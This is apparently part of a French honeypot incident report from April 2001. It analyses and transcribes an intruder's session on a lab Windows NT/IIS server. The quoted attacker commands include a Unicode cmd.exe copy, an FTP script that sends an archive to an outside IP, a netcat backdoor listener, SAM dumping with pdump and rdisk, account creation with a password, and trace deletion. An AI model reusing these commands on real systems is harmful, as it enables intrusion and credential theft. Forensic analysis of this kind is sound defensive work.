'echo best honey pot i've seen till now :) > rfp.tx 

'type README.NOW.Hax0r' 

'mdir test' 

'copy default.htm default.html' 

'echo >> default.htm' 

Lit le fichier signant la première attaque 

Commet une seule erreur 

Sauvegarde la page d'accueil 

Et ajoute une ligne à l'original 

Durée 15s L'attaquant finit par se déconnecter 

NC 6868 5536 'exit' Déconnexion par arrêt de l'interpréteur 

HEURE: 14h50 

INCIDENT N°3 Reprise des attaques perpétrées depuis l'adresse 1Cust162.tnt13.stk3.da.uu.net 


Durée 8s Un grand silence: quelques connexions WEB et quelques 'pings' puis de nouveau: 

UNICODE 5286 cmd.exe /c copy c:\winnt\system32\cmd.exe cmd1.exe Copie d'un interpréteur 

Durée 52s Il transfère un fichier d'archive 

HTTP 5302-6 

5317-20 

5348-52 

5362-66 

5375-79 

cmd1.exe echo open 213.116.251.162 > ftpcom 

cmd1.exe echo johna2k >> ftpcom 

cmd1.exe echo put c;\wiretrip\whisker.tar.gz >> ftpcom 

cmd1.exe echo quit >> ftpcom 

cmd1.exe fto -s ftpcom 

L'attaquant place un fichier de commande 

ftp visant à rapatrier une archive 

contenant whisker sur son système ! 

FTP 5379 Initialisation du Transfert FTP 

Durée 1mn59s Se ménage un point d'entrée 

UNICODE cmd1.exe nc -l -p 6969 cmd1.exe Activation d'un accès caché sur TCP/6969 

FTP 5736 Fin du Transfert FTP 

Durée 43s Détruit les traces 

HTTP 5766-69 cmd1.exe del ftpcom On efface les traces 

A partir de cet instant aucune autre activité anormale n'est journalisée 

Analyse de niveau "Session" (Durée approximative: 2 heures avec les résultats précédents) 



Avril 2001 

Certains outils, dont EtherReal proposent une fonction permettant de reconstituer le flux des données échangées sur 

une session TCP/IP. L'analyste peut alors suivre aisement le déroulement des actions ce qui simplifie l'investiguation. 

Dans le cas présent, cette approche permet de confirmer certaines hypothèses mais reste limitée, une grande partie 

des attaques utilisant une multitude de flux HTTP. 

Session Incident N°1 - TCP/6969 

Le lecteur qui aura le courage de lire la transcription de cette session ne manquera pas de noter les nombreuses 

erreurs de frappe et l'utilisation systématique de la commande 'dir'. Il comprendra pourquoi l'attaquant est obligé de 

déconnecter la session: il tente de visualiser un fichier binaire contenant des caractères de contrôles qui engendrent 

un dysfonctionnement du terminal ! Notons que pour conserver une transcription lisible et d'une taille raisonnable, 

les résultats des commandes 'dir' ne sont pas tous affichés. 



Avril 2001 

Microsoft(R) Windows NT(TM) 

(C) Copyright 1985-1996 Microsoft Corp. 

C:\Program Files\Common Files\system\msadc>dir 

Volume in drive C has no label. 

Volume Serial Number is 8403-6A0E 

Directory of C:\Program …… 

02/04/01 06:41a . 

02/04/01 06:41a .. 

09/25/97 07:41a 596 adcjavas.inc 

09/25/97 07:41a 589 adcvbs.inc 

04/30/97 11:00p 208,144 cmd1.exe 

02/04/01 06:41a 98 ftpcom 

09/25/97 08:28a 172,816 msadce.dll 

09/25/97 08:16a 5,632 msadcer.dll 

09/25/97 08:24a 23,312 msadcf.dll 

09/25/97 08:24a 91,408 msadco.dll 

09/25/97 08:19a 5,120 msadcor.dll 

09/26/97 08:19a 42,256 msadcs.dll 

02/04/01 06:41a 59,392 nc.exe 

02/04/01 06:41a 32,768 pdump.exe 

10/02/97 07:28a 19,388 readme.txt 

02/04/01 06:41a 36,864 samdump.dll 

16 File(s) 698,383 bytes 

1,690,861,056 bytes free 


(Résultats identiques - Aucun changement) 

C:\Program Files\Common Files\system\msadc> [Adir 

The name specified is not recognized as an internal 

or external command, operable program or batchfile. 



C:\Program Files\Common Files\system\msadc>del ftpcom 

C:\Program Files\Common Files\system\msadc>ls 



C:\Program Files\Common Files\system\msadcr>dir 


C:\Program Files\Common Files\system\msadc> type readme.e 

The system cannot find the file specified. 

C:\Program Files\Common Files\system\msadc>c: 

The filename, directory name, or volume label 

syntax is incorrect. 

C:\Program Files\Common Files\system\msadc>cd\ 

C:\>dir 



Directory of C:\ 

11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 06:26a 7 fun 

12/07/00 03:30p InetPub 

12/07/00 03:12p Multimedia Files 

12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 

12/21/00 08:59p Program Files 

12/21/00 08:59p TEMP 

02/04/01 06:42a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

14 File(s) 78,643,529 bytes 

1,690,861,056 bytes free 

C:\>rm 



C:\>del fun 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 


12/21/00 08:59p TEMP 

02/04/01 06:42a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

13 File(s) 78,643,522 bytes 

1,690,861,056 bytes free 

C:\>cd exploites 

The system cannot find the path specified. 

C:\>dir 


C:\>cd exploits 

C:\exploits>dir 



Directory of C:\exploits 

12/26/00 07:36p . 

12/26/00 07:36p .. 

12/26/00 07:36p microsoft 

12/26/00 07:35p newfiles 

12/26/00 07:24p unix 

5 File(s) 0 bytes 

1,690,861,056 bytes free 

C:\exploits>cd microsoft 

C:\exploits\microsoft>dir 



Directory of C:\exploits\microsoft 

12/26/00 07:36p . 

12/26/00 07:36p .. 

11/05/97 09:46a 87,312 95sscrk.zip 

08/15/00 02:06p 734 ac.zip 

08/12/98 09:46a 9,417 anger.tar.gz 


1,690,861,056 bytes free 

C:\exploits\microsoft>cd .. 

C:\exploits>cd newfiles 

C:\exploits\newfiles>dir 



Directory of C:\exploits\newfiles 

12/26/00 07:35p . 

12/26/00 07:35p .. 


1,690,861,056 bytes free 

C:\exploits\newfiles>cd .. 

C:\exploits>cd unix 

C:\exploits\unix>dir 



Directory of C:\exploits\unix 

12/26/00 07:24p . 

12/26/00 07:24p .. 

12/26/00 07:25p sunos-exploits 

12/26/00 07:24p tcp-exploits 

12/26/00 07:24p trojans 

12/26/00 07:16p udp-exploits 

12/26/00 07:15p ultrix-exploits 

12/26/00 07:15p xwin-exploits 


1,690,861,056 bytes free 

C:\exploits\unix>cd .. 





12/26/00 07:36p . 

12/26/00 07:36p .. 

12/26/00 07:36p microsoft 

12/26/00 07:35p newfiles 

12/26/00 07:24p unix 


1,690,861,056 bytes free 

C:\exploits>cd .. 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 


12/21/00 08:59p TEMP 

02/04/01 06:42a WINNT 

12/26/00 07:09p wiretrip 



Avril 2001 

02/04/01 06:43a 0 yay.txt 

13 File(s) 78,643,522 bytes 

1,690,861,056 bytes free 

1,690,861,056 bytes free 

C:\>dir 


C:\>dir' 



C:\>dir 


C:\>cat yay 



C:\>type yay. 

The system cannot find the file specified. 

C:\>type yay.txt 

C:\>net session 

System error 5 has occurred. 

Access is denied. 

C:\>net users 

User accounts for \\ 

--------------------------------------------------- 

Administrator Guest IUSR_KENNY IWAM_KENNY 

The command completed with one or more errors. 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 


12/21/00 08:59p TEMP 

02/04/01 06:46a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

02/04/01 06:46a 38 yay2.txt 

14 File(s) 78,643,560 bytes 

1,690,861,056 bytes free 

C:\>type yay2.txt 

There are no entries in the list. 

C:\>del yay2.txt 

del yay2.txt 

C:\>net session >>yay3.txt 



C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 


12/21/00 08:59p TEMP 

02/04/01 06:46a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

02/04/01 06:48a 0 yay3.txt 

14 File(s) 78,643,522 bytes 

1,690,861,056 bytes free 

C:\>del yay& * 

Could Not Find C:\yay 



C:\>dir 


C:\>del yay* 

The process cannot access the file because 

it is being used by another process. 

C:\>del yay3.txt 

Could Not Find C:\yay3.txt 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 


12/21/00 08:59p TEMP 

02/04/01 06:46a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

13 File(s) 78,643,522 bytes 

1,690,861,056 bytes free 

C:\>dir 


C:\>yuper 

The name specified is not recognized as an 

internal or external command, operable program or 

batch file. 

C:\>type heh.txt 


--------------------------------------------------- 



C:\>del heh.txt 

C:\>cd program files 

C:\Program Files>dir 



Directory of C:\Program Files 

12/21/00 08:59p . 

12/21/00 08:59p .. 

12/07/00 03:11p Common Files 

12/21/00 08:59p D4 

12/07/00 03:23p ICW-Internet Connection 

12/07/00 03:37p Microsoft FrontPage 

12/07/00 03:34p Mts 

12/07/00 03:23p Outlook Express 

11/26/00 06:42p Plus! 

12/16/00 06:54p Syslogd 

11/26/00 06:56p Windows NT 


1,690,861,056 bytes free 

C:\Program Files>cd .. 

C:\dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 


12/21/00 08:59p TEMP 

02/04/01 06:48a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

13 File(s) 78,643,522 bytes 

1,690,861,056 bytes free 

C:\>echo Hi, i know that this a is a lab server, but 

patch the holes! :-) 

>>README.NOW.Hax0r 

echo Hi, i know that this a is a lab server, but patch 

the holes! :-) >>README.NOW.Hax0r 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

12/07/00 03:30p InetPub 




Avril 2001 

12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 


02/04/01 06:49a 69 README.NOW.Hax0r 

12/21/00 08:59p TEMP 

02/04/01 06:48a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

14 File(s) 78,643,591 bytes 

1,690,861,056 bytes free 

C:\>dir 


C:\>net group 

Group Accounts for \\ 

--------------------------------------------------- 

*Domain Admins *Domain Guests *Domain Users 


C:\>net localgroup 

System error 1312 has occurred. A specified logon 

session does not exist.It may already have been 

terminated. 

C:\>net group domaine admins 

The syntax of this command is: 

NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN] 

groupname {/ADD [/COMMENT:"text"] | /DELETE 

[/DOMAIN] groupname username [...] {/ADD | /DELETE} 

[/DOMAIN] 

C:\> [Anet group /? 


or external command, operable program or batch ile. 

C:\>net group ?? 





[/DOMAIN] 

C:\>net group /? 


C:\>net group 

Group Accounts for \\ 

--------------------------------------------------- 

*Domain Admins *Domain Guests *Domain Users 


C:\>net localgroup 


session does not exist. It may already have been 

terminated. 

C:\>net localgroup /domain admins 


C:\>net localgroup domain admins 





[/DOMAIN] 

C:\>net users 


--------------------------------------------------- 






C:\> [A [A [Anet localgroup domain admins 

The name specified is not recognized as an internal or 

external command, operable program or batch file. 

C:\>net group domain admins 





[/DOMAIN] 

C:\>net localgroup administrators 

Alias name administrators 

Comment Members can fully administer the 

computer/domain Members 

--------------------------------------------------- 

Administrator Domain Admins 

The command completed successfully. 

C:\> [Anet localgroup administrators 



C:\>net localgroup administrators 




--------------------------------------------------- 

Administrator Domain Admins IUSR_KENNY IWAM_KENNY 





C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



12/21/00 08:59p TEMP 

02/04/01 06:55a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

14 File(s) 78,643,591 bytes 

1,690,852,864 bytes free 

C:\>cd program files 





12/21/00 08:59p . 

12/21/00 08:59p .. 


12/21/00 08:59p D4 



12/07/00 03:34p Mts 


11/26/00 06:42p Plus! 

12/16/00 06:54p Syslogd 

11/26/00 06:56p Windows NT 


1,690,852,864 bytes free 

C:\Program Files>cd common files 

C:\Program Files\Common Files>dir 



Directory of C:\Program Files\Common Files 

12/07/00 03:11p . 

12/07/00 03:11p .. 

12/07/00 03:23p Microsoft Shared 

12/07/00 03:35p ODBC 

12/07/00 03:23p Services 

12/07/00 03:23p System 


1,690,852,864 bytes free 

C:\Program Files\Common Files>cd obdc 




C:\Program Files\Common Files>cd microsoft shadr red 



C:\Program Files\Common Files>cd microsoft shared 

C:\Program Files\Common Files\Microsoft Shared>dir 



Directory of C:\Program … 

12/07/00 03:23p . 

12/07/00 03:23p .. 

12/07/00 03:23p Stationery 

12/07/00 03:09p TextConv 


1,690,852,864 bytes free 

C:\Program Files\Common Files\Microsoft Shared>cd .. 

C:\Program Files\Common Files>cd odbc 

C:\Program Files\Common Files\ODBC>dir 





Avril 2001 

Directory of C:\Program Files\Common Files\ODBC 

12/07/00 03:35p . 

12/07/00 03:35p .. 

12/07/00 03:35p Data Sources 


1,690,852,864 bytes free 

C:\Program Files\Common Files\ODBC>cd data dou 


C:\Program Files\Common Files\ODBC>cd data sources 

C:\Program Files\Common Files\ODBC\Data Sources>dir 




12/07/00 03:35p . 

12/07/00 03:35p .. 


1,690,852,864 bytes free 

C:\Program Files>cd.. 

C:\Program Files\Common Files\ODBC>cd .. 




Directory of C:\Program Files\Common Files 

12/07/00 03:11p . 

12/07/00 03:11p .. 

12/07/00 03:23p Microsoft Shared 

12/07/00 03:35p ODBC 

12/07/00 03:23p Services 

12/07/00 03:23p System 


1,690,852,864 bytes free 

C:\Program Files\Common Files>cd system 

C:\Program Files\Common Files\System>dir 



Directory of C:\Program Files\Common Files\System 

12/07/00 03:23p . 

12/07/00 03:23p .. 

12/07/00 03:34p ado 

02/04/01 06:43a msadc 

12/07/00 03:34p ole db 

11/11/97 12:50p 399,120 wab32.dll 


1,690,852,864 bytes free 

C:\Program Files\Common Files\System>cd msads 




C:\Program Files\Common Files\System>cd msas dcs 



C:\Program Files\Common Files\System>cd msadcc 

C:\Program Files\Common Files\System\msadc>dir 




02/04/01 06:43a . 

02/04/01 06:43a .. 

09/25/97 07:41a 596 adcjavas.inc 

09/25/97 07:41a 589 adcvbs.inc 

04/30/97 11:00p 208,144 cmd1.exe 

09/25/97 08:28a 172,816 msadce.dll 

09/25/97 08:16a 5,632 msadcer.dll 

09/25/97 08:24a 23,312 msadcf.dll 

09/25/97 08:24a 91,408 msadco.dll 

09/25/97 08:19a 5,120 msadcor.dll 

09/26/97 08:19a 42,256 msadcs.dll 

02/04/01 06:41a 59,392 nc.exe 

02/04/01 06:41a 32,768 pdump.exe 

10/02/97 07:28a 19,388 readme.txt 

02/04/01 06:41a 36,864 samdump.dll 


1,690,852,864 bytes free 

C:\Program Files\Common Files\System\msadc>psu 



C:\Program Files\Common Files\System\msadc>pdump 

Failed to open lsass: 5. Exiting. 

C:\Program Files\Common Files\System\msadc>net start 

These Windows NT services are started: 

Alerter 

Computer Browser 

EventLog 

FTP Publishing Service 

IIS Admin Service 

License Logging Service 

Messenger 

MSDTC 

Net Logon 

NT LM Security Support Provider 

Plug and Play 

Protected Storage 

Remote Procedure Call (RPC) Locator 

Remote Procedure Call (RPC) Service 

Server 

Spooler 

TCP/IP NetBIOS Helper 

Workstation 

World Wide Web Publishing Service 


C:\Program Files\Common Files\System\msadc>net localgroup 

administrators 




--------------------------------------------------- 

Administrator Domain Admins IUSR_KENNY IWAM_KENNY 





C:\Program Files\Common Files\System\msadc>net users 


--------------------------------------------------- 



C:\Program Files\Common Files\System\msadc>net users 


C:\Program Files\Common Files\System\msadc>net users /? 


NET USER [username [password | *] [options]] 

[/DOMAIN] username {password | *} /ADD [options] 

[/DOMAIN] username [/DELETE] [/DOMAIN] 

C:\Program Files\Common Files\System\msadc>net users hi 

guy /ADD 



terminated. 

C:\Program Files\Common Files\System\msadc>/net 



C:\Program Files\Common Files\System\msadc>netnet password 



C:\Program Files\Common Files\System\msadc>net user 


--------------------------------------------------- 



C:\Program Files\Common Files\System\msadc>net user /? 


NET USER [username [password | *] [options]] 

[/DOMAIN] username {password | *} /ADD [options] 

[/DOMAIN] username [/DELETE] [/DOMAIN] 

C:\Program Files\Common Files\System\msadc>net user himan 

HarHar666 /ADD 



terminated. 

C:\Program Files\Common Files\System\msadc>net name 

Name 

-------------------------------------------------- 

LAB 

ADMINISTRATOR 




--------------------------------------------------- 




Administrator 



terminated. 

C:\Program Files\Common Files\System\msadc>cd /winnt 

The syntax of the command is incorrect. 



Avril 2001 





02/04/01 06:43a . 

02/04/01 06:43a .. 

09/25/97 07:41a 596 adcjavas.inc 

09/25/97 07:41a 589 adcvbs.inc 

04/30/97 11:00p 208,144 cmd1.exe 

09/25/97 08:28a 172,816 msadce.dll 

09/25/97 08:16a 5,632 msadcer.dll 

09/25/97 08:24a 23,312 msadcf.dll 

09/25/97 08:24a 91,408 msadco.dll 

09/25/97 08:19a 5,120 msadcor.dll 

09/26/97 08:19a 42,256 msadcs.dll 

02/04/01 06:41a 59,392 nc.exe 

02/04/01 06:41a 32,768 pdump.exe 

10/02/97 07:28a 19,388 readme.txt 

02/04/01 06:41a 36,864 samdump.dll 


1,690,852,864 bytes free 

C:\Program Files\Common Files\System\msadc>cd \winnt 

C:\WINNT>cd C:\Program Files\Common Files\System \msadc 

C:\Program Files\Common Files\System\msadc>del c 

Could Not Find C:\Program Files\Common 

Files\System\msadc\c 

C:\Program Files\Common Files\System\msadc>del 

samdump.dll 


pdump.exe 



C:\Program Files\Common Files\System\msadc>cd\winnt 

C:\WINNT>cd resp 



C:\WINNT>cd repair 

C:\WINNT\repair>dir 



Directory of C:\WINNT\repair 

11/26/00 06:43p . 

11/26/00 06:43p .. 

10/13/96 07:38p 438 autoexec.nt 

11/26/00 12:34p 2,510 config.nt 

11/26/00 06:43p 15,677 default._ 

11/26/00 06:43p 14,946 ntuser.da_ 

11/26/00 06:43p 4,593 sam._ 

11/26/00 06:43p 6,066 security._ 

11/26/00 06:54p 50,405 setup.log 

11/26/00 06:43p 124,776 software._ 

11/26/00 06:43p 80,874 system._ 


1,690,922,496 bytes free 

C:\WINNT\repair>rdisk -s/ 

C:\WINNT\repair>d rd 



C:\WINNT\repair>rdisk -/s 





11/26/00 06:43p . 

11/26/00 06:43p .. 

10/13/96 07:38p 438 autoexec.nt 

11/26/00 12:34p 2,510 config.nt 

11/26/00 06:43p 15,677 default._ 

11/26/00 06:43p 14,946 ntuser.da_ 

11/26/00 06:43p 4,593 sam._ 

11/26/00 06:43p 6,066 security._ 

11/26/00 06:54p 50,405 setup.log 

11/26/00 06:43p 124,776 software._ 

11/26/00 06:43p 80,874 system._ 


1,690,922,496 bytes free 

C:\WINNT\repair>rdisk 

C:\WINNT\repair>rdisk -s 





11/26/00 06:43p . 

11/26/00 06:43p .. 

10/13/96 07:38p 438 autoexec.nt 

11/26/00 12:34p 2,510 config.nt 

11/26/00 06:43p 15,677 default._ 

11/26/00 06:43p 14,946 ntuser.da_ 

11/26/00 06:43p 4,593 sam._ 

11/26/00 06:43p 6,066 security._ 

11/26/00 06:54p 50,405 setup.log 

11/26/00 06:43p 124,776 software._ 

11/26/00 06:43p 80,874 system._ 


1,690,922,496 bytes free 

C:\WINNT\repair>cat 



C:\WINNT\repair>type sam._ 


C:\WINNT\repair>dir (taille $$hive$$.tmp augmente) 




C:\WINNT\repair>dir (taille $$hive$$.tmp stable) 



C:\WINNT\repair>cd\ 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



12/21/00 08:59p TEMP 

02/04/01 07:05a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

15 File(s) 78,648,918 bytes 

1,689,455,616 bytes free 

C:\>type har.txt 

(Contenu du fichier) 

C:\>ÿþ‡ÿü dir 



C:\>ÿþ dir (Même erreur) 

C:\>ÿþ‡ÿü cd wiretrip (Même erreur) 

C:\>ÿü‡ÿþ cd exit (Même erreur) 

C:\>ÿþ‡ÿü exit (Même erreur) 

C:\>ÿü‡ÿþ 


Cette transcription correspond à la reprise de l'activité interrompue par l'erreur commise précédemment: la 

visualisation d'un fichier binaire. Le profil correspond toujours: de nombreuses fautes de frappes et l'utilisation 

outrancière de la commande 'dir'. 



Avril 2001 

Microsoft(R) Windows NT(TM) 

(C) Copyright 1985-1996 Microsoft Corp. 




Directory of C:\Program Files\Common Files\system\msadc 

02/04/01 07:04a . 

02/04/01 07:04a .. 

09/25/97 07:41a 596 adcjavas.inc 

09/25/97 07:41a 589 adcvbs.inc 

04/30/97 11:00p 208,144 cmd1.exe 

09/25/97 08:28a 172,816 msadce.dll 

09/25/97 08:16a 5,632 msadcer.dll 

09/25/97 08:24a 23,312 msadcf.dll 

09/25/97 08:24a 91,408 msadco.dll 

09/25/97 08:19a 5,120 msadcor.dll 

09/26/97 08:19a 42,256 msadcs.dll 

02/04/01 06:41a 59,392 nc.exe 

10/02/97 07:28a 19,388 readme.txt 


1,690,259,968 bytes free 

C:\Program Files\Common Files\system\msadc>net session 



C:\Program Files\Common Files\system\msadc>cd\ 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



12/21/00 08:59p TEMP 

02/04/01 07:08a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

15 File(s) 78,648,918 bytes 

1,690,259,968 bytes free 

C:\>del yay.txt 

The process cannot access the file because 

it is being used by another process. 

C:\>cd wiretrip 

C:\wiretrip>dir 



Directory of C:\wiretrip 

12/26/00 07:09p . 

12/26/00 07:09p .. 

12/26/00 07:04p 15,501 msadc1.pl 

12/26/00 07:04p 17,865 msadc2.pl 

12/26/00 07:04p 4,425 RFParalyze.c 

12/26/00 07:04p 2,269 RFPickaxe.pl 

12/26/00 07:05p 7,393 RFPoison.c 

12/26/00 07:04p 12,450 RFPoison.zip 

12/26/00 07:04p 1,792 RFProwl.c 

12/26/00 07:06p 170,372 whisker.tar.gz 

12/26/00 07:06p 173,427 whisker.zip 

12/26/00 07:05p 25,229 whiskerids.html 


1,690,259,968 bytes free 

C:\wiretrip>cd .. 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 CONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



12/21/00 08:59p TEMP 

02/04/01 07:08a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

15 File(s) 78,648,918 bytes 

1,690,259,968 bytes free 

C:\>cdinetpub 


internal or external command, operable program or batch 

file. 

C:\>dir 


C:\>cd .. 

C:\>cd new folder 

C:\New Folder>dir 



Directory of C:\New Folder 

12/26/00 07:10p . 

12/26/00 07:10p .. 


1,690,259,968 bytes free 

C:\New Folder>cd .. 

C:\>cd inetpub 

C:\InetPub>dir 



Directory of C:\InetPub 

12/07/00 03:30p . 

12/07/00 03:30p .. 

11/26/00 12:40p ftproot 

11/26/00 12:40p gophroot 

12/07/00 03:31p iissamples 

11/26/00 12:40p scripts 

12/15/00 08:56p wwwroot 


1,690,259,968 bytes free 

C:\InetPub>cd wwwroot 

C:\InetPub\wwwroot>dir 



Directory of C:\InetPub\wwwroot 

12/15/00 08:56p . 

12/15/00 08:56p .. 

12/07/00 03:37p cgi-bin 

12/07/00 03:37p 4,663 default.asp 

12/15/00 10:26p 1,233 default.htm 

12/07/00 03:37p 4,325 default.htm.org 

12/15/00 09:15p guest 

12/07/00 03:37p images 

12/15/00 06:36p 709 lrfpbot.gif 

12/15/00 07:05p 673 lrfptop.gif 

12/15/00 06:36p 1,422 nmrc.gif 

12/07/00 03:37p 2,504 postinfo.html 

12/15/00 06:36p 968 rfp.gif 

12/15/00 06:36p 8,606 rfpback.gif 

12/15/00 06:36p 8,606 rfpback1.gif 

11/26/00 12:40p samples 

12/15/00 06:36p 1,624 sf.gif 

12/15/00 06:36p 756 technotronic.gif 

12/15/00 06:36p 2,526 void.gif 

12/15/00 06:36p 1,213 whisker.gif 

12/15/00 06:36p 1,161 win2k.gif 

12/07/00 03:37p _private 

12/07/00 03:37p 1,759 _vti_inf.html 


1,690,259,968 bytes free 

C:\InetPub\wwwroot>copy c:\har.txt 

1 file(s) copied. 

C:\InetPub\wwwroot>del hat r.txt 



C:\InetPub\wwwroot>del har.txt 





02/04/01 07:11a . 

02/04/01 07:11a .. 

12/07/00 03:37p cgi-bin 

12/07/00 03:37p 4,663 default.asp 

12/15/00 10:26p 1,233 default.htm 


12/15/00 09:15p guest 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:37p images 

12/15/00 06:36p 709 lrfpbot.gif 



Avril 2001 

12/15/00 07:05p 673 lrfptop.gif 

12/15/00 06:36p 1,422 nmrc.gif 


12/15/00 06:36p 968 rfp.gif 

12/15/00 06:36p 8,606 rfpback.gif 

12/15/00 06:36p 8,606 rfpback1.gif 

11/26/00 12:40p samples 

12/15/00 06:36p 1,624 sf.gif 


12/15/00 06:36p 2,526 void.gif 

12/15/00 06:36p 1,213 whisker.gif 

12/15/00 06:36p 1,161 win2k.gif 

12/07/00 03:37p _private 

12/07/00 03:37p 1,759 _vti_inf.html 


1,690,254,336 bytes free 







C:\InetPub\wwwroot>type 










C:\InetPub\wwwroot>cd guest 

C:\InetPub\wwwroot\guest>dir 



Directory of C:\InetPub\wwwroot\guest 

12/15/00 09:15p . 

12/15/00 09:15p .. 

12/15/00 08:59p 1 

12/15/00 09:09p 2 

12/15/00 08:59p 3 

01/05/01 11:27a 1,829 default.asp 

05/07/99 09:14p 200,704 DVMailer.DLL 

12/15/00 09:11p 10,017 guestbook.asp 

06/15/99 12:17p 18 GuestBook.bot 

01/25/01 04:12p 27,843 GuestBook.HTM 

01/25/01 04:12p 2,691 GUESTBOOK.LOG 

12/15/00 09:22p 413 GuestBook.top 

12/15/00 06:36p 709 lrfpbot.gif 

12/15/00 07:05p 673 lrfptop.gif 

12/15/00 06:36p 1,422 nmrc.gif 

06/16/99 10:45a 4,441 Readme 

12/15/00 06:36p 968 rfp.gif 

12/15/00 06:36p 8,606 rfpback.gif 

12/15/00 06:36p 8,606 rfpback1.gif 

12/15/00 06:36p 1,624 sf.gif 


06/16/99 08:50a 186 ViewGB.asp 

12/15/00 06:36p 2,526 void.gif 

12/15/00 06:36p 1,213 whisker.gif 

12/15/00 06:36p 1,161 win2k.gif 


1,690,254,336 bytes free 

C:\InetPub\wwwroot\guest>cd .. 

C:\InetPub\wwwroot>d: 

The system cannot find the drive specified. 

C:\InetPub\wwwroot>e: 


C:\InetPub\wwwroot>f: 


C:\InetPub\wwwroot>h : 



C:\InetPub\wwwroot>h: 


C:\InetPub\wwwroot>g: 


C:\InetPub\wwwroot>f: 


C:\InetPub\wwwroot>a: 

a:The system cannot find the drive specified. 

C:\InetPub\wwwroot>b: 

b:The system cannot find the drive specified. 

C:\InetPub\wwwroot>cd\ 

C:\>dir 




11/26/00 12:34p 0 AUTOEXEC.BAT 

11/26/00 06:57p 322 boot.ini 

11/26/00 12:34p 0 C ONFIG.SYS 

12/26/00 07:36p exploits 

02/04/01 07:07a 5,327 har.txt 

12/07/00 03:30p InetPub 


12/26/00 07:10p New Folder 

01/26/01 02:10p 78,643,200 pagefile.sys 



12/21/00 08:59p TEMP 

02/04/01 07:14a WINNT 

12/26/00 07:09p wiretrip 

02/04/01 06:43a 0 yay.txt 

15 File(s) 78,648,918 bytes 

1,690,254,336 bytes free 

C:\>cd temp 

C:\TEMP>dir 



Directory of C:\TEMP 

12/21/00 08:59p . 

12/21/00 08:59p .. 

12/16/00 06:54p 81,920 Arm2.tmp 

12/16/00 06:54p 16 E65B8AC0.TMP 

12/21/00 08:59p IXP1.tmp 

12/20/00 05:12p 7,680 DF64D5.tmp 


1,690,254,336 bytes free 

